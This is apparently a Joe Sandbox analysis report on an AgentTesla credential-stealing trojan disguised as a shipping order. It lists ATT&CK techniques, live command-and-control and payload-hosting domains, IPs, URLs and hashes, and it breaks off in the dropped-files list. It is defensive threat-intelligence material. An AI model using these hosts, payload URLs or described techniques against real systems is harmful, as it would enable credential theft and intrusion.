                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		21
                        Input Capture                        		24
                        System Information Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                        Obfuscated Files or Information                        		1
                        Credentials in Registry                        		1
                        Query Registry                        		SMB/Windows Admin Shares1
                        Email Collection                        		2
                        Non-Application Layer Protocol                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                        Software Packing                        		NTDS131
                        Security Software Discovery                        		Distributed Component Object Model21
                        Input Capture                        		23
                        Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Process Discovery                        		SSH1
                        Clipboard Data                        		Fallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials151
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                        Process Injection                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        ShippingOrder_ GSHS2400052.exe34%ReversingLabsWin32.Trojan.AgentTesla
                        ShippingOrder_ GSHS2400052.exe43%VirustotalBrowse

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        SourceDetectionScannerLabelLink
                        bg.microsoft.map.fastly.net0%VirustotalBrowse
                        mail.iaa-airferight.com3%VirustotalBrowse
                        playerenterprises.org12%VirustotalBrowse
                        fp2e7a.wpc.phicdn.net0%VirustotalBrowse

                        URLs

                        SourceDetectionScannerLabelLink
                        http://playerenterprises.org12%VirustotalBrowse
                        https://playerenterprises.org1%VirustotalBrowse
                        http://mail.iaa-airferight.com3%VirustotalBrowse
                        https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt010%VirustotalBrowse
                        https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt10%VirustotalBrowse
                        https://playerenterprises.org/BaseVirtualEnvironment/yummy.txt10%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.210.172
                        		truefalseunknown
                        mail.iaa-airferight.com
                        		46.175.148.58
                        		truetrueunknown
                        playerenterprises.org
                        		193.222.96.147
                        		truefalseunknown
                        api.ipify.org
                        		172.67.74.152
                        		truefalse
                          		high
                          fp2e7a.wpc.phicdn.net
                          		192.229.211.108
                          		truefalseunknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high
                            https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txtfalseunknown
                            https://playerenterprises.org/BaseVirtualEnvironment/yummy.txtfalseunknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://playerenterprises.orgShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003A63000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://api.ipify.orgShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://upx.sf.netAmcache.hve.4.drfalse
                                		high
                                https://account.dyn.com/ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, ShippingOrder_ GSHS2400052.exe, 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.ipify.org/tMSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://playerenterprises.org/BaseVirtualEnvironment/6621c520c9ebd.txt0ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4105077153.0000000002B01000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://playerenterprises.orgShippingOrder_ GSHS2400052.exe, 00000000.00000002.1873279881.0000000003001000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      http://mail.iaa-airferight.comMSBuild.exe, 00000001.00000002.4105077153.0000000002B7C000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      46.175.148.58
                                      		mail.iaa-airferight.comUkraine
                                      		56394ASLAGIDKOM-NETUAtrue
                                      193.222.96.147
                                      		playerenterprises.orgGermany
                                      		3303SWISSCOMSwisscomSwitzerlandLtdCHfalse
                                      172.67.74.152
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1429031
                                      Start date and time:2024-04-20 06:47:05 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 48s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:9
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:ShippingOrder_ GSHS2400052.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@4/5@3/3
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 79
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 40.126.29.7, 40.126.29.11, 40.126.29.12, 40.126.29.6, 40.126.29.9, 40.126.29.10, 40.126.29.13, 40.126.29.5, 199.232.210.172, 192.229.211.108, 40.68.123.157, 13.95.31.18, 20.42.73.29, 52.165.164.15
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                      • Execution Graph export aborted for target ShippingOrder_ GSHS2400052.exe, PID 6424 because it is empty
                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      06:47:54API Interceptor55x Sleep call for process: ShippingOrder_ GSHS2400052.exe modified
                                      06:48:01API Interceptor11274074x Sleep call for process: MSBuild.exe modified
                                      06:48:16API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      46.175.148.58Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                        SAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                          Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                            remittance payment of invoice DMWW24009.exeGet hashmaliciousAgentTeslaBrowse
                                              Proforma Invoice - Well Ergon.exeGet hashmaliciousAgentTeslaBrowse
                                                PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                  SecuriteInfo.com.Win32.PWSX-gen.14523.13498.exeGet hashmaliciousAgentTeslaBrowse
                                                    order Depeng POORD20231109001.exeGet hashmaliciousAgentTeslaBrowse
                                                      Swift_copy.pdf (2).exeGet hashmaliciousAgentTeslaBrowse
                                                        Swift Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                          193.222.96.147PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                            172.67.74.152Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json
                                                            Sky-Beta.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json
                                                            Sky-Beta-Setup.exeGet hashmaliciousStealitBrowse
                                                            • api.ipify.org/?format=json
                                                            Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                            • api.ipify.org/?format=json
                                                            SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json
                                                            SongOfVikings.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json
                                                            Sky-Beta Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                            • api.ipify.org/?format=json

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            fp2e7a.wpc.phicdn.nethttps://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://28.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                            • 192.229.211.108
                                                            https://jainpokliultachor.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                            • 192.229.211.108
                                                            https://19apmacc8.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://eshoradebitcoin.com/3.datGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • 192.229.211.108
                                                            https://kajdbhfkjahsdifhi.z19.web.core.windows.net/Er0Win8helpline76/index.htmlGet hashmaliciousUnknownBrowse
                                                            • 192.229.211.108
                                                            https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495Get hashmaliciousTechSupportScamBrowse
                                                            • 192.229.211.108
                                                            mail.iaa-airferight.comLeoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            SAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            remittance payment of invoice DMWW24009.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Proforma Invoice - Well Ergon.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            SecuriteInfo.com.Win32.PWSX-gen.14523.13498.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            order Depeng POORD20231109001.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Swift_copy.pdf (2).exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Swift Copy.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            bg.microsoft.map.fastly.nethttps://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            https://28.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                            • 199.232.214.172
                                                            https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                            • 199.232.214.172
                                                            https://support1-4ec.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                            • 199.232.210.172
                                                            https://support-bxv.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                            • 199.232.214.172
                                                            https://k19gdtyrshgcjghldjk.z13.web.core.windows.net/Win/index.html?phone=nullGet hashmaliciousTechSupportScamBrowse
                                                            • 199.232.210.172
                                                            https://19apmic17.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                            • 199.232.214.172
                                                            https://www.canva.com/design/DAGC4eUhMw0/cKr_ImwjL8JW0nUMNMi5QA/view?utm_content=DAGC4eUhMw0&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                            • 199.232.214.172
                                                            https://app.box.com/s/hiphn6dvy4mquaedfrgoqd500cedhazaGet hashmaliciousUnknownBrowse
                                                            • 199.232.210.172
                                                            playerenterprises.orgPO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 193.222.96.147
                                                            api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            IMG_210112052.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 172.67.74.152
                                                            z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            PO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 172.67.74.152
                                                            eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                            • 172.67.74.152
                                                            Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 104.26.13.205
                                                            eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            avp.msiGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                            • 172.67.74.152

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            ASLAGIDKOM-NETUALeoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.145.107
                                                            SAMPLE PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Eaton PO-45150292964.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            remittance payment of invoice DMWW24009.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Proforma Invoice - Well Ergon.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            PURCHASE ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            SecuriteInfo.com.Win32.PWSX-gen.14523.13498.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            order Depeng POORD20231109001.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Swift_copy.pdf (2).exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            SWISSCOMSwisscomSwitzerlandLtdCHEncrypted_PaymentAdvice_Reference.htmlGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.222.96.119
                                                            z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 193.222.96.21
                                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 193.222.96.21
                                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 193.222.96.21
                                                            wFtZih4nN9.elfGet hashmaliciousMiraiBrowse
                                                            • 85.7.65.219
                                                            dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                            • 193.222.96.11
                                                            http://t.cm.morganstanley.com/r/?id=h1b92d14,134cc33c,1356be32&p1=esi-doc.one/YWGTytNgAkCXj6A/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/c451eb59da652ea3e0bb7f8bf62dc775/bXNvbG9yemFub0Bsc2ZjdS5vcmc=&d=DwMGaQGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.222.96.132
                                                            enEQvjUlGl.elfGet hashmaliciousMiraiBrowse
                                                            • 178.194.189.44
                                                            Oo2yeTdq5J.elfGet hashmaliciousMiraiBrowse
                                                            • 85.2.40.128
                                                            3OcPSlVa7n.elfGet hashmaliciousMiraiBrowse
                                                            • 161.78.204.214
                                                            CLOUDFLARENETUSqk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                            • 172.67.180.119
                                                            SecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            0OqTUkeaoD.exeGet hashmaliciousRedLineBrowse
                                                            • 104.20.3.235
                                                            https://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                            • 172.66.47.24
                                                            https://jainpokliultachor.pages.dev/Get hashmaliciousUnknownBrowse
                                                            • 104.22.24.131
                                                            https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                            • 104.21.53.38
                                                            https://19apmacc8.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                            • 104.22.24.131
                                                            https://loo54.z11.web.core.windows.net/werrx01USAHTML/?bcda=1-844-621-0495Get hashmaliciousTechSupportScamBrowse
                                                            • 172.67.208.186
                                                            https://support1-4ec.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                            • 172.66.44.177
                                                            https://support-bxv.pages.dev/Get hashmaliciousTechSupportScamBrowse
                                                            • 172.66.44.120

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.PWSX-gen.25825.12964.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            0OqTUkeaoD.exeGet hashmaliciousRedLineBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            IMG_210112052.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            https://keenetownhall-my.sharepoint.com/:b:/g/personal/amanda_keenetownhall_org/ESKbqbSIMj5ElsbdsfaEg7oBgkFm5H_JqS97uaySzVhJDQ?e=KMMz4yGet hashmaliciousHTMLPhisherBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            https://www.canva.com/design/DAGC4eUhMw0/cKr_ImwjL8JW0nUMNMi5QA/view?utm_content=DAGC4eUhMw0&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            z1E-catalogSamples.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            rTDN001-180424_PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            PO-095325.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152
                                                            W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                            • 193.222.96.147
                                                            • 172.67.74.152

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_ShippingOrder_ G_c05f69ea49c545b52540ede261d1523dc0c4da49_19f2bd8d_292068fc-b850-4303-bb11-dec50d1c5818\Report.wer

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):1.2120825092482466
                                                            Encrypted:false
                                                            SSDEEP:192:1jiw295081zbaWB+lPIUMpzuiFZZ24lO8z+:piw2g81zbamIgVpzuiFZY4lO8z
                                                            MD5:D1AF2656809F4EB0D3BF479402C49E6C
                                                            SHA1:E46EE1A278A9E76EF86C50930313C0BD2C60331B
                                                            SHA-256:19F6637298273D2BC0958DDC5F64B6858BF46F0A9AAD6113119CB70B6942BADB
                                                            SHA-512:23B417B12EECC8DEFB776DF6B1DE15587312B5C78D5652699EE3CBEF41326367BE1ECEC7DA3E77C162CEDA7954E223D9E7156F0AAD05D0F0427C4DD6187F6C96
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.0.6.2.0.8.0.4.2.2.9.6.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.0.6.2.0.8.1.2.1.9.8.3.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.9.2.0.6.8.f.c.-.b.8.5.0.-.4.3.0.3.-.b.b.1.1.-.d.e.c.5.0.d.1.c.5.8.1.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.5.e.a.6.2.8.-.f.1.5.0.-.4.2.3.4.-.a.1.e.d.-.8.b.c.8.4.2.c.b.b.7.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.S.h.i.p.p.i.n.g.O.r.d.e.r._. .G.S.H.S.2.4.0.0.0.5.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.1.8.-.0.0.0.1.-.0.0.1.4.-.9.7.f.9.-.f.d.e.7.d.d.9.2.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.e.c.b.e.f.1.6.7.d.5.9.4.1.2.b.2.f.5.c.3.6.c.9.f.d.7.7.1.c.0.9.0.0.0.0.f.f.f.f.!.0.0.0.0.0.8.a.5.5.8.e.b.2.7.2.9.5.a.8.e.3.f.7.0.a.7.a.0.5.c.f.9.5.8.e.2.9.0.7.f.d.9.7.0.!.S.h.i.p.p.i.n.g.O.r.d.e.r._. .G.S.H.S.2.4.0.0.0.5.2.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER16C2.tmp.dmp

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
                                                            File Type:Mini DuMP crash report, 16 streams, Sat Apr 20 04:48:00 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):571139
                                                            Entropy (8bit):2.703775943496332
                                                            Encrypted:false
                                                            SSDEEP:3072:s0IOFRGEYHc4n+P3KcSk6T3q1CCqpPw3+vCtdN9tdN9tdN9tdCfmoaTe8lCp:s0BY8vqTLoqtw3QUTeA
                                                            MD5:6A78E945F0750DDB8C70EAA1B7DAAE62
                                                            SHA1:9216E650BF2E5B12E7B05C4CC967104CC16E1F71
                                                            SHA-256:DEEA68B23086D7C727168976B6FDBE7E93FFAAC137FF307A8518D34F1B48A4B0
                                                            SHA-512:D9B46E13DE8C216FC2251D68FD6101A07A9E3588708622B8AF646C6D566F394800FF1D32D66E2364234909AAA9D9DFA1F1BE047B98B9F9A5FF0A7D877159230F
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MDMP..a..... ........I#f............T...............t.......<...D*...........*.......=..............l.......8...........T........... ^...X..........P=..........<?..............................................................................eJ.......?......Lw......................T............H#f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER184A.tmp.WERInternalMetadata.xml

                                                            Download File
                                                            Process:C:\Windows\System32\WerFault.exe
